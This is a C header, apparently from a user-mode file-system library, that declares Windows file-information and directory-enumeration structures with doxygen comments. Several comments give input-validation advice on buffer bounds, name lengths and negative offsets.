#define FILE_DISPOSITION_DO_NOT_DELETE 0x00000000 // Specifies the system should not delete a file.
#define FILE_DISPOSITION_DELETE 0x00000001 // Specifies the system should delete a file.
#define FILE_DISPOSITION_POSIX_SEMANTICS 0x00000002 // Specifies the system should perform a POSIX-style delete.
#define FILE_DISPOSITION_FORCE_IMAGE_SECTION_CHECK 0x00000004 // Specifies the system should force an image section check.
#define FILE_DISPOSITION_ON_CLOSE 0x00000008 // Specifies if the system sets or clears the on-close state.
/**
 * \struct FILE_DISPOSITION_INFORMATION_EX
 * \brief Used as an argument to the ZwSetInformationFile routine.
 *
 * This is a set-information class: the struct arrives during IRP_MJ_SET_INFORMATION with class FileDispositionInformationEx.
 */
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
/**
 * Specifies what action(s) the system should take with a specific file while deleting.
 * Any combination of the FILE_DISPOSITION_* flags defined above; a handler should reject or ignore bits it does not know.
 *
 * \li \c FILE_DISPOSITION_DO_NOT_DELETE Specifies the system should not delete a file.
 * \li \c FILE_DISPOSITION_DELETE Specifies the system should delete a file.
 * \li \c FILE_DISPOSITION_POSIX_SEMANTICS Specifies the system should perform a POSIX-style delete.
 * \li \c FILE_DISPOSITION_FORCE_IMAGE_SECTION_CHECK Specifies the system should force an image section check.
 * \li \c FILE_DISPOSITION_ON_CLOSE Specifies if the system sets or clears the on-close state.
 */
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, *PFILE_DISPOSITION_INFORMATION_EX;
/**
 * \struct FILE_END_OF_FILE_INFORMATION
 * \brief Used as an argument to the ZwSetInformationFile routine.
 *
 * This is a set-information class: the struct arrives during IRP_MJ_SET_INFORMATION with class FileEndOfFileInformation.
 */
typedef struct _FILE_END_OF_FILE_INFORMATION {
/**
 * The absolute new end of file position as a byte offset from the start of the file.
 * The value is signed (LARGE_INTEGER); a handler should reject negative offsets before using it as a size.
 */
LARGE_INTEGER EndOfFile;
} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
/**
 * \struct FILE_VALID_DATA_LENGTH_INFORMATION
 * \brief Used as an argument to ZwSetInformationFile.
 *
 * This is a set-information class: the struct arrives during IRP_MJ_SET_INFORMATION with class FileValidDataLengthInformation.
 */
typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
/**
 * Specifies the new valid data length for the file.
 * This parameter must be a positive value that is greater than the current valid data length, but less than or equal to the current file size.
 *
 * NOTE(review): raising the valid data length makes allocated-but-never-written on-disk bytes readable; the Win32 equivalent
 * (SetFileValidData) requires SE_MANAGE_VOLUME_PRIVILEGE for that reason, and a file-system implementation should apply an
 * equivalent check or zero-fill the exposed range.
 */
LARGE_INTEGER ValidDataLength;
} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
/**
 * \struct FILE_BASIC_INFORMATION
 * \brief Used as an argument to routines that query or set file information.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileBasicInformation and FileAllInformation,
 * and is also delivered on the set path (IRP_MJ_SET_INFORMATION with FileBasicInformation). On the set path, the
 * documented Windows semantics treat a zero time field as "leave unchanged"; a handler should do the same.
 */
typedef struct _FILE_BASIC_INFORMATION {
/**
 * Specifies the time that the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Specifies the time that the file was last accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Specifies the time that the file was last written to.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Specifies the last time the file was changed (metadata change, as opposed to LastWriteTime for data).
 */
LARGE_INTEGER ChangeTime;
/**
 * Specifies one or more FILE_ATTRIBUTE_XXX flags. For descriptions of these flags,
 * see the documentation for the GetFileAttributes function in the Microsoft Windows SDK.
 */
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
/**
 * \struct FILE_STANDARD_INFORMATION
 * \brief Used as an argument to routines that query or set file information.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileStandardInformation and FileAllInformation
 */
typedef struct _FILE_STANDARD_INFORMATION {
/**
 * The file allocation size in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * The end of file location as a byte offset (i.e. the logical file size).
 */
LARGE_INTEGER EndOfFile;
/**
 * The number of hard links to the file.
 */
ULONG NumberOfLinks;
/**
 * The delete pending status. TRUE indicates that a file deletion has been requested.
 */
BOOLEAN DeletePending;
/**
 * The file directory status. TRUE indicates the file object represents a directory.
 */
BOOLEAN Directory;
} FILE_STANDARD_INFORMATION, *PFILE_STANDARD_INFORMATION;
/**
 * \struct FILE_POSITION_INFORMATION
 * \brief Used as an argument to routines that query or set file information.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FilePositionInformation and FileAllInformation
 */
typedef struct _FILE_POSITION_INFORMATION {
/**
 * The byte offset of the current file pointer. Signed (LARGE_INTEGER); a handler on the set path should reject negative values.
 */
LARGE_INTEGER CurrentByteOffset;
} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
/**
 * \struct FILE_DIRECTORY_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * Variable-length: the entry ends with a name of FileNameLength bytes starting at FileName. Entries are chained through
 * NextEntryOffset inside a caller-supplied buffer, so both producers and consumers must keep every entry inside that buffer.
 */
typedef struct _FILE_DIRECTORY_INFORMATION {
/**
 * Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * When walking a buffer, check that a non-zero offset is at least the fixed part of the struct and lands inside the buffer
 * before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Specifies the first character of the file name string.
 * This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
/**
 * \struct FILE_FULL_DIR_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * Variable-length: the entry ends with a name of FileNameLength bytes starting at FileName, and entries are chained
 * through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_FULL_DIR_INFORMATION {
/**
 * Byte offset of the next FILE_FULL_DIR_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Combined length, in bytes, of the extended attributes (EA) for the file.
 */
ULONG EaSize;
/**
 * Specifies the first character of the file name string.
 * This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
/**
 * \struct FILE_ID_FULL_DIR_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * Same layout as FILE_FULL_DIR_INFORMATION with the 8-byte FileId inserted before the name.
 * Variable-length; entries are chained through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_ID_FULL_DIR_INFORMATION {
/**
 * Byte offset of the next FILE_ID_FULL_DIR_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Combined length, in bytes, of the extended attributes (EA) for the file.
 */
ULONG EaSize;
/**
 * The 8-byte file reference number for the file. (Note that this is not the same as the 16-byte
 * "file object ID" that was added to NTFS for Microsoft Windows 2000.)
 */
LARGE_INTEGER FileId;
/**
 * Specifies the first character of the file name string.
 * This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
/**
 * \struct FILE_BOTH_DIR_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * "Both" refers to the long name (FileName) and the fixed-size short 8.3 name (ShortName) being returned together.
 * Variable-length; entries are chained through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_BOTH_DIR_INFORMATION {
/**
 * Byte offset of the next FILE_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Combined length, in bytes, of the extended attributes (EA) for the file.
 */
ULONG EaSize;
/**
 * Specifies the length, in bytes, of the short file name string. Must not exceed sizeof(ShortName).
 */
CCHAR ShortNameLength;
/**
 * Unicode string containing the short (8.3) name for the file. Fixed-size and not NUL-terminated; use ShortNameLength.
 */
WCHAR ShortName[12];
/**
 * Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
/**
 * \struct FILE_ID_BOTH_DIR_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * Same layout as FILE_BOTH_DIR_INFORMATION with the 8-byte FileId inserted between ShortName and FileName.
 * Variable-length; entries are chained through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
/**
 * Byte offset of the next FILE_ID_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Combined length, in bytes, of the extended attributes (EA) for the file.
 */
ULONG EaSize;
/**
 * Specifies the length, in bytes, of the short file name string. Must not exceed sizeof(ShortName).
 */
CCHAR ShortNameLength;
/**
 * Unicode string containing the short (8.3) name for the file. Fixed-size and not NUL-terminated; use ShortNameLength.
 */
WCHAR ShortName[12];
/**
 * The 8-byte file reference number for the file. This number is generated and assigned to the file by the file system.
 * (Note that the FileId is not the same as the 16-byte "file object ID" that was added to NTFS for Microsoft Windows 2000.)
 */
LARGE_INTEGER FileId;
/**
 * Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
/**
 * \struct FILE_ID_EXTD_BOTH_DIR_INFORMATION
 * \brief Used to query detailed information for the files in a directory.
 *
 * Extended variant of FILE_ID_BOTH_DIR_INFORMATION: adds ReparsePointTag and widens the file id to FILE_ID_128.
 * Variable-length; entries are chained through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_ID_EXTD_BOTH_DIR_INFORMATION {
/**
 * Byte offset of the next FILE_ID_EXTD_BOTH_DIR_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Time when the file was created.
 */
LARGE_INTEGER CreationTime;
/**
 * Last time the file was accessed.
 */
LARGE_INTEGER LastAccessTime;
/**
 * Last time information was written to the file.
 */
LARGE_INTEGER LastWriteTime;
/**
 * Last time the file was changed.
 */
LARGE_INTEGER ChangeTime;
/**
 * Absolute end-of-file position as a byte offset from the start of the file.
 * EndOfFile specifies the byte offset to the end of the file.
 * Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
 * EndOfFile is the offset to the byte immediately following the last valid byte in the file.
 */
LARGE_INTEGER EndOfFile;
/**
 * File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
 */
LARGE_INTEGER AllocationSize;
/**
 * File attributes, which can be any valid combination of the following:
 *
 * \li \c FILE_ATTRIBUTE_READONLY
 * \li \c FILE_ATTRIBUTE_HIDDEN
 * \li \c FILE_ATTRIBUTE_SYSTEM
 * \li \c FILE_ATTRIBUTE_DIRECTORY
 * \li \c FILE_ATTRIBUTE_ARCHIVE
 * \li \c FILE_ATTRIBUTE_NORMAL
 * \li \c FILE_ATTRIBUTE_TEMPORARY
 * \li \c FILE_ATTRIBUTE_COMPRESSED
 */
ULONG FileAttributes;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Combined length, in bytes, of the extended attributes (EA) for the file.
 */
ULONG EaSize;
/**
 * Tag value for the reparse point. Only meaningful when FileAttributes contains FILE_ATTRIBUTE_REPARSE_POINT.
 */
ULONG ReparsePointTag;
/**
 * The 128-bit (16-byte) file reference number for the file. This number is generated and assigned to the file by the file system.
 */
FILE_ID_128 FileId;
/**
 * Specifies the length, in bytes, of the short file name string. Must not exceed sizeof(ShortName).
 */
CCHAR ShortNameLength;
/**
 * Unicode string containing the short (8.3) name for the file. Fixed-size and not NUL-terminated; use ShortNameLength.
 */
WCHAR ShortName[12];
/**
 * Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_ID_EXTD_BOTH_DIR_INFORMATION, *PFILE_ID_EXTD_BOTH_DIR_INFORMATION;
/**
 * \struct FILE_NAMES_INFORMATION
 * \brief Used to query detailed information about the names of files in a directory.
 *
 * The smallest of the directory-enumeration entries: names only, no timestamps or sizes.
 * Variable-length; entries are chained through NextEntryOffset inside a caller-supplied buffer.
 */
typedef struct _FILE_NAMES_INFORMATION {
/**
 * Byte offset for the next FILE_NAMES_INFORMATION entry, if multiple entries are present in a buffer.
 * This member is zero if no other entries follow this one.
 * A consumer should verify a non-zero offset stays inside the buffer before following it.
 */
ULONG NextEntryOffset;
/**
 * Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
 * in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
 */
ULONG FileIndex;
/**
 * Specifies the length, in bytes (not characters), of the file name string.
 */
ULONG FileNameLength;
/**
 * Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
 * The name is not guaranteed to be NUL-terminated; bound every read by FileNameLength.
 */
WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
/*
 * DOS-style wildcard placeholder characters, in narrow (ANSI_*) and wide (DOS_*) form.
 * These code points stand in for the DOS '*', '?' and '.' wildcards in search expressions;
 * they are not valid in ordinary file names, so a name containing them should be treated as a pattern, not a path.
 */
#define ANSI_DOS_STAR ('<')
#define ANSI_DOS_QM ('>')
#define ANSI_DOS_DOT ('"')
#define DOS_STAR (L'<')
#define DOS_QM (L'>')
#define DOS_DOT (L'"')
/**
 * \struct FILE_INTERNAL_INFORMATION
 * \brief Used to query for the file system's 8-byte file reference number for a file.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileInternalInformation
 */
typedef struct _FILE_INTERNAL_INFORMATION {
/**
 * The 8-byte file reference number for the file. This number is assigned by the file system and is file-system-specific.
 * (Note that this is not the same as the 16-byte "file object ID" that was added to NTFS for Microsoft Windows 2000.)
 * It is the same value reported as FileId by the FILE_ID_*_DIR_INFORMATION entries above.
 */
LARGE_INTEGER IndexNumber;
} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
/**
 * \struct FILE_ID_INFORMATION
 * \brief Contains identification information for a file.
 *
 * This structure is returned from the GetFileInformationByHandleEx function when FileIdInfo is passed in the FileInformationClass parameter.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileIdInformation
 */
typedef struct _FILE_ID_INFORMATION {
/**
 * The serial number of the volume that contains a file.
 */
ULONGLONG VolumeSerialNumber;
/**
 * The 128-bit file identifier for the file. The file identifier and the volume serial number uniquely identify a file on a single computer.
 * To determine whether two open handles represent the same file, combine the identifier and the volume serial number for each file and compare them.
 */
FILE_ID_128 FileId;
} FILE_ID_INFORMATION, *PFILE_ID_INFORMATION;
/**
 * \struct FILE_EA_INFORMATION
 * \brief Used to query for the size of the extended attributes (EA) for a file.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileEaInformation and FileAllInformation
 */
typedef struct _FILE_EA_INFORMATION {
/**
 * Specifies the combined length, in bytes, of the extended attributes for the file. Zero when the file has no EAs.
 */
ULONG EaSize;
} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
/**
 * \struct FILE_ACCESS_INFORMATION
 * \brief Used to query for or set the access rights of a file.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
 */
typedef struct _FILE_ACCESS_INFORMATION {
/**
 * Flags that specify a set of access rights in the access mask of an access control entry.
 * This member is a value of type ACCESS_MASK. It reports the access granted to the handle being queried,
 * not the access the caller would be granted on a fresh open.
 */
ACCESS_MASK AccessFlags;
} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
/**
 * \struct FILE_MODE_INFORMATION
 * \brief Used to query or set the access mode of a file.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
 */
typedef struct _FILE_MODE_INFORMATION {
/**
 * Specifies the mode in which the file will be accessed following a create-file or open-file operation.
 * This parameter is either zero or the bitwise OR of one or more of the following file option flags
 * (the same values as the FILE_* create options defined near the end of this header):
 *
 * \li \c FILE_WRITE_THROUGH
 * \li \c FILE_SEQUENTIAL_ONLY
 * \li \c FILE_NO_INTERMEDIATE_BUFFERING
 * \li \c FILE_SYNCHRONOUS_IO_ALERT
 * \li \c FILE_SYNCHRONOUS_IO_NONALERT
 * \li \c FILE_DELETE_ON_CLOSE
 */
ULONG Mode;
} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
/**
 * \struct FILE_ALL_INFORMATION
 * \brief Structure is a container for several FILE_XXX_INFORMATION structures.
 *
 * The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
 *
 * NameInformation is the only variable-length member and must therefore stay last; sizeof(FILE_ALL_INFORMATION)
 * covers only the first WCHAR of the name, so a producer must size the output buffer by FileNameLength as well.
 */
typedef struct _FILE_ALL_INFORMATION {
/** \see FILE_BASIC_INFORMATION */
FILE_BASIC_INFORMATION BasicInformation;
/** \see FILE_STANDARD_INFORMATION */
FILE_STANDARD_INFORMATION StandardInformation;
/** \see FILE_INTERNAL_INFORMATION */
FILE_INTERNAL_INFORMATION InternalInformation;
/** \see FILE_EA_INFORMATION */
FILE_EA_INFORMATION EaInformation;
/** \see FILE_ACCESS_INFORMATION */
FILE_ACCESS_INFORMATION AccessInformation;
/** \see FILE_POSITION_INFORMATION */
FILE_POSITION_INFORMATION PositionInformation;
/** \see FILE_MODE_INFORMATION */
FILE_MODE_INFORMATION ModeInformation;
/** \see FILE_ALIGNMENT_INFORMATION */
FILE_ALIGNMENT_INFORMATION AlignmentInformation;
/** \see FILE_NAME_INFORMATION (variable-length; must remain the last member) */
FILE_NAME_INFORMATION NameInformation;
} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
/**
 * \struct FILE_ALLOCATION_INFORMATION
 * \brief Used to set the allocation size for a file.
 *
 * The struct is requested during IRP_MJ_SET_INFORMATION with query FileAllocationInformation
 */
typedef struct _FILE_ALLOCATION_INFORMATION {
/**
 * File allocation size, in bytes. Usually this value is a multiple
 * of the sector or cluster size of the underlying physical device.
 * Signed (LARGE_INTEGER); a handler should reject negative values before using it as a size.
 */
LARGE_INTEGER AllocationSize;
} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
/**
 * \struct FILE_LINK_INFORMATION
 * \brief Used to create an NTFS hard link to an existing file.
 *
 * The struct is requested during IRP_MJ_SET_INFORMATION with query FileLinkInformation
 *
 * Variable-length: FileName is FileNameLength bytes long. The name is caller-controlled input and the handler should
 * validate it (length against the request buffer, embedded NULs, whether a full path is acceptable) before creating the link.
 */
typedef struct _FILE_LINK_INFORMATION {
/**
 * Set to TRUE to specify that if the link already exists, it should be replaced with the new link.
 * Set to FALSE if the link creation operation should fail if the link already exists.
 */
BOOLEAN ReplaceIfExists;
/**
 * If the link is to be created in the same directory as the file that is being linked to,
 * or if the FileName member contains the full pathname for the link to be created, this is NULL.
 * Otherwise it is a handle for the directory where the link is to be created.
 */
HANDLE RootDirectory;
/**
 * Length, in bytes, of the file name string.
 */
ULONG FileNameLength;
/**
 * The first character of the name to be assigned to the newly created link.
 * This is followed in memory by the remainder of the string; it is not guaranteed to be NUL-terminated.
 * If the RootDirectory member is NULL and the link is to be created in a different directory from the file that is being linked to,
 * this member specifies the full pathname for the link to be created. Otherwise, it specifies only the file name.
 * (See the Remarks section for ZwQueryInformationFile for details on the syntax of this file name string.)
 */
WCHAR FileName[1];
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
/**
 * \struct FILE_RENAME_INFORMATION
 * \brief Used to rename a file.
 *
 * The struct is requested during IRP_MJ_SET_INFORMATION with query FileRenameInformation
 *
 * Variable-length: FileName is FileNameLength bytes long. The new name is caller-controlled input; the handler should
 * bound it by the request buffer and validate it before applying the rename.
 */
typedef struct _FILE_RENAME_INFORMATION {
/**
 * Set to TRUE to specify that if a file with the given name already exists, it should be replaced with the given file.
 * Set to FALSE if the rename operation should fail if a file with the given name already exists.
 * Replacing an existing target is a destructive operation; the handler should confirm the caller may delete the target.
 */
BOOLEAN ReplaceIfExists;
/**
 * If the file is not being moved to a different directory,
 * or if the FileName member contains the full pathname, this member is NULL. Otherwise,
 * it is a handle for the root directory under which the file will reside after it is renamed.
 */
HANDLE RootDirectory;
/**
 * Length, in bytes, of the new name for the file.
 */
ULONG FileNameLength;
/**
 * The first character of a wide-character string containing the new name for the file.
 * This is followed in memory by the remainder of the string; it is not guaranteed to be NUL-terminated. If the RootDirectory member is NULL,
 * and the file is being moved to a different directory, this member specifies the full pathname to be assigned to the file.
 * Otherwise, it specifies only the file name or a relative pathname.
 */
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
/**
 * \struct FILE_STREAM_INFORMATION
 * \brief Used to enumerate the streams for a file.
 *
 * This is a query class: the struct is requested during IRP_MJ_QUERY_INFORMATION with query FileStreamInformation
 * (it is not a set-information class). Variable-length; entries are chained through NextEntryOffset inside a
 * caller-supplied buffer.
 */
